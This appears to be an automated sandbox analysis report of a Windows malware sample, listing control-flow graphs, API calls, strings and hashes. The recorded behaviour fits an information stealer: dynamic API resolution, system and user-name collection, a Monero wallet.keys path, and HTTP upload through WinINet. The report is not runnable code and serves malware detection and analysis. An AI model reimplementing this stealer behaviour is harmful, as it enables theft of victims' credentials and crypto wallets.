lstrcpy 15159->15160 15161 3c21d5 15160->15161 15162 3ca9b0 4 API calls 15161->15162 15163 3c21f6 15162->15163 15164 3ca8a0 lstrcpy 15163->15164 15165 3c21ff 15164->15165 15758 3c7ed0 GetSystemInfo wsprintfA 15165->15758 15168 3ca9b0 4 API calls 15169 3c221f 15168->15169 15170 3ca8a0 lstrcpy 15169->15170 15171 3c2228 15170->15171 15172 3ca9b0 4 API calls 15171->15172 15173 3c2247 15172->15173 15174 3ca8a0 lstrcpy 15173->15174 15175 3c2250 15174->15175 15176 3ca9b0 4 API calls 15175->15176 15177 3c2270 15176->15177 15178 3ca8a0 lstrcpy 15177->15178 15179 3c2279 15178->15179 15760 3c8100 GetProcessHeap RtlAllocateHeap 15179->15760 15182 3ca9b0 4 API calls 15183 

                    Control-flow Graph (function starting at 3c9860; rendered graph and raw edge list not reproduced)
                    APIs
                    • GetProcAddress.KERNEL32(76210000,01181730), ref: 003C98A1
                    • GetProcAddress.KERNEL32(76210000,01181508), ref: 003C98BA
                    • GetProcAddress.KERNEL32(76210000,01181748), ref: 003C98D2
                    • GetProcAddress.KERNEL32(76210000,01181760), ref: 003C98EA
                    • GetProcAddress.KERNEL32(76210000,011816D0), ref: 003C9903
                    • GetProcAddress.KERNEL32(76210000,01188C70), ref: 003C991B
                    • GetProcAddress.KERNEL32(76210000,01175430), ref: 003C9933
                    • GetProcAddress.KERNEL32(76210000,011755D0), ref: 003C994C
                    • GetProcAddress.KERNEL32(76210000,01181628), ref: 003C9964
                    • GetProcAddress.KERNEL32(76210000,01181658), ref: 003C997C
                    • GetProcAddress.KERNEL32(76210000,01181640), ref: 003C9995
                    • GetProcAddress.KERNEL32(76210000,01181520), ref: 003C99AD
                    • GetProcAddress.KERNEL32(76210000,011755F0), ref: 003C99C5
                    • GetProcAddress.KERNEL32(76210000,01181550), ref: 003C99DE
                    • GetProcAddress.KERNEL32(76210000,01181778), ref: 003C99F6
                    • GetProcAddress.KERNEL32(76210000,011754F0), ref: 003C9A0E
                    • GetProcAddress.KERNEL32(76210000,01181568), ref: 003C9A27
                    • GetProcAddress.KERNEL32(76210000,01181670), ref: 003C9A3F
                    • GetProcAddress.KERNEL32(76210000,01175510), ref: 003C9A57
                    • GetProcAddress.KERNEL32(76210000,01181820), ref: 003C9A70
                    • GetProcAddress.KERNEL32(76210000,011753B0), ref: 003C9A88
                    • LoadLibraryA.KERNEL32(01181838,?,003C6A00), ref: 003C9A9A
                    • LoadLibraryA.KERNEL32(01181808,?,003C6A00), ref: 003C9AAB
                    • LoadLibraryA.KERNEL32(011817F0,?,003C6A00), ref: 003C9ABD
                    • LoadLibraryA.KERNEL32(01181850,?,003C6A00), ref: 003C9ACF
                    • LoadLibraryA.KERNEL32(01181868,?,003C6A00), ref: 003C9AE0
                    • GetProcAddress.KERNEL32(75B30000,01181880), ref: 003C9B02
                    • GetProcAddress.KERNEL32(751E0000,01181898), ref: 003C9B23
                    • GetProcAddress.KERNEL32(751E0000,011818B0), ref: 003C9B3B
                    • GetProcAddress.KERNEL32(76910000,01188EB0), ref: 003C9B5D
                    • GetProcAddress.KERNEL32(75670000,011753D0), ref: 003C9B7E
                    • GetProcAddress.KERNEL32(77310000,01188B90), ref: 003C9B9F
                    • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003C9BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 003C9BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                    • Instruction ID: 00f3c0dd61510ac6d8ed5fea76c9b61d48aa509f99cec28f37e5c4d9dd5a519e
                    • Opcode Fuzzy Hash: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                    • Instruction Fuzzy Hash: 9FA18DF5501241AFC308EFA9ED88E7637F9F768380704851AA60DC3224D77DA84AEB13

                    Control-flow Graph (function starting at 3b45c0; rendered graph and raw edge list not reproduced)
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B460E
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003B479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4729
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 2f85e3a60251f6610dda29a90920a36c9900dae399cf1f8f816e905478098c72
                    • Instruction ID: 16ee70012a7afb5dac59a922f98f5a155917db9e8f367b9cd685d127eb3549ca
                    • Opcode Fuzzy Hash: 2f85e3a60251f6610dda29a90920a36c9900dae399cf1f8f816e905478098c72
                    • Instruction Fuzzy Hash: 9B41FF626C6618EAFE2AFBE4AC42FDD77765F42B09F507082EA0053793CBB065214536

                    Control-flow Graph (function starting at 3b4880; rendered graph and raw edge list not reproduced)
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B4915
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B4ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003D0DDB,00000000,?,?,00000000,?,",00000000,?,0118F9D8), ref: 003B4DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B4E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B4E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B4E49
                    • InternetCloseHandle.WININET(00000000), ref: 003B4EAD
                    • InternetCloseHandle.WININET(00000000), ref: 003B4EC5
                    • HttpOpenRequestA.WININET(00000000,0118FAA8,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B4B15
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • InternetCloseHandle.WININET(00000000), ref: 003B4ECF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                    • Instruction ID: 7ebfaae00544dc2345e76b75334c3623c4bd0da190f15601e017a699477cb5ee
                    • Opcode Fuzzy Hash: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                    • Instruction Fuzzy Hash: 6712C87291061CABDB16EB90DC92FEEB778AF14304F50419DB106AA091EF702F49CF66
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                    • Instruction ID: 5cf26d08c785ec9b0d3d326c4a9f0f4e1ed096289aa6da4abb3ce0d5ff52cb54
                    • Opcode Fuzzy Hash: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                    • Instruction Fuzzy Hash: B7F044F1944208AFC700DF95DD45FAEBBB8F704751F100159FA05E3680C7781904CBA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                    • Instruction ID: 767420209e0aeff40f29aeb1bc64090218ba4525e7fb29b236cd7ba78641afad
                    • Opcode Fuzzy Hash: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                    • Instruction Fuzzy Hash: DED05EB490130CDBCB00EFE0D849AEDBB78FB08315F000554D909B2340EA346486CAA6

                    Control-flow Graph

                    control_flow_graph 633 3c9c10-3c9c1a 634 3ca036-3ca0ca LoadLibraryA * 8 633->634 635 3c9c20-3ca031 GetProcAddress * 43 633->635 636 3ca0cc-3ca141 GetProcAddress * 5 634->636 637 3ca146-3ca14d 634->637 635->634 636->637 638 3ca216-3ca21d 637->638 639 3ca153-3ca211 GetProcAddress * 8 637->639 640 3ca21f-3ca293 GetProcAddress * 5 638->640 641 3ca298-3ca29f 638->641 639->638 640->641 642 3ca2a5-3ca332 GetProcAddress * 6 641->642 643 3ca337-3ca33e 641->643 642->643 644 3ca41f-3ca426 643->644 645 3ca344-3ca41a GetProcAddress * 9 643->645 646 3ca428-3ca49d GetProcAddress * 5 644->646 647 3ca4a2-3ca4a9 644->647 645->644 646->647 648 3ca4dc-3ca4e3 647->648 649 3ca4ab-3ca4d7 GetProcAddress * 2 647->649 650 3ca515-3ca51c 648->650 651 3ca4e5-3ca510 GetProcAddress * 2 648->651 649->648 652 3ca612-3ca619 650->652 653 3ca522-3ca60d GetProcAddress * 10 650->653 651->650 654 3ca67d-3ca684 652->654 655 3ca61b-3ca678 GetProcAddress * 4 652->655 653->652 656 3ca69e-3ca6a5 654->656 657 3ca686-3ca699 GetProcAddress 654->657 655->654 658 3ca708-3ca709 656->658 659 3ca6a7-3ca703 GetProcAddress * 4 656->659 657->656 659->658
                    APIs
                    • GetProcAddress.KERNEL32(76210000,01175550), ref: 003C9C2D
                    • GetProcAddress.KERNEL32(76210000,011756B0), ref: 003C9C45
                    • GetProcAddress.KERNEL32(76210000,01189030), ref: 003C9C5E
                    • GetProcAddress.KERNEL32(76210000,01189048), ref: 003C9C76
                    • GetProcAddress.KERNEL32(76210000,01189060), ref: 003C9C8E
                    • GetProcAddress.KERNEL32(76210000,0118D918), ref: 003C9CA7
                    • GetProcAddress.KERNEL32(76210000,0117A548), ref: 003C9CBF
                    • GetProcAddress.KERNEL32(76210000,0118D828), ref: 003C9CD7
                    • GetProcAddress.KERNEL32(76210000,0118DAB0), ref: 003C9CF0
                    • GetProcAddress.KERNEL32(76210000,0118DA38), ref: 003C9D08
                    • GetProcAddress.KERNEL32(76210000,0118D888), ref: 003C9D20
                    • GetProcAddress.KERNEL32(76210000,01175570), ref: 003C9D39
                    • GetProcAddress.KERNEL32(76210000,01175350), ref: 003C9D51
                    • GetProcAddress.KERNEL32(76210000,01175590), ref: 003C9D69
                    • GetProcAddress.KERNEL32(76210000,01175450), ref: 003C9D82
                    • GetProcAddress.KERNEL32(76210000,0118D9D8), ref: 003C9D9A
                    • GetProcAddress.KERNEL32(76210000,0118DA80), ref: 003C9DB2
                    • GetProcAddress.KERNEL32(76210000,0117A908), ref: 003C9DCB
                    • GetProcAddress.KERNEL32(76210000,01175650), ref: 003C9DE3
                    • GetProcAddress.KERNEL32(76210000,0118DA68), ref: 003C9DFB
                    • GetProcAddress.KERNEL32(76210000,0118D990), ref: 003C9E14
                    • GetProcAddress.KERNEL32(76210000,0118D948), ref: 003C9E2C
                    • GetProcAddress.KERNEL32(76210000,0118D8A0), ref: 003C9E44
                    • GetProcAddress.KERNEL32(76210000,01175490), ref: 003C9E5D
                    • GetProcAddress.KERNEL32(76210000,0118D858), ref: 003C9E75
                    • GetProcAddress.KERNEL32(76210000,0118D9C0), ref: 003C9E8D
                    • GetProcAddress.KERNEL32(76210000,0118DA50), ref: 003C9EA6
                    • GetProcAddress.KERNEL32(76210000,0118DA98), ref: 003C9EBE
                    • GetProcAddress.KERNEL32(76210000,0118D9F0), ref: 003C9ED6
                    • GetProcAddress.KERNEL32(76210000,0118D8E8), ref: 003C9EEF
                    • GetProcAddress.KERNEL32(76210000,0118D7C8), ref: 003C9F07
                    • GetProcAddress.KERNEL32(76210000,0118D8B8), ref: 003C9F1F
                    • GetProcAddress.KERNEL32(76210000,0118D8D0), ref: 003C9F38
                    • GetProcAddress.KERNEL32(76210000,0117FE70), ref: 003C9F50
                    • GetProcAddress.KERNEL32(76210000,0118D9A8), ref: 003C9F68
                    • GetProcAddress.KERNEL32(76210000,0118D810), ref: 003C9F81
                    • GetProcAddress.KERNEL32(76210000,01175390), ref: 003C9F99
                    • GetProcAddress.KERNEL32(76210000,0118D7E0), ref: 003C9FB1
                    • GetProcAddress.KERNEL32(76210000,01175370), ref: 003C9FCA
                    • GetProcAddress.KERNEL32(76210000,0118D7F8), ref: 003C9FE2
                    • GetProcAddress.KERNEL32(76210000,0118D900), ref: 003C9FFA
                    • GetProcAddress.KERNEL32(76210000,011754B0), ref: 003CA013
                    • GetProcAddress.KERNEL32(76210000,011754D0), ref: 003CA02B
                    • LoadLibraryA.KERNEL32(0118D960,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA03D
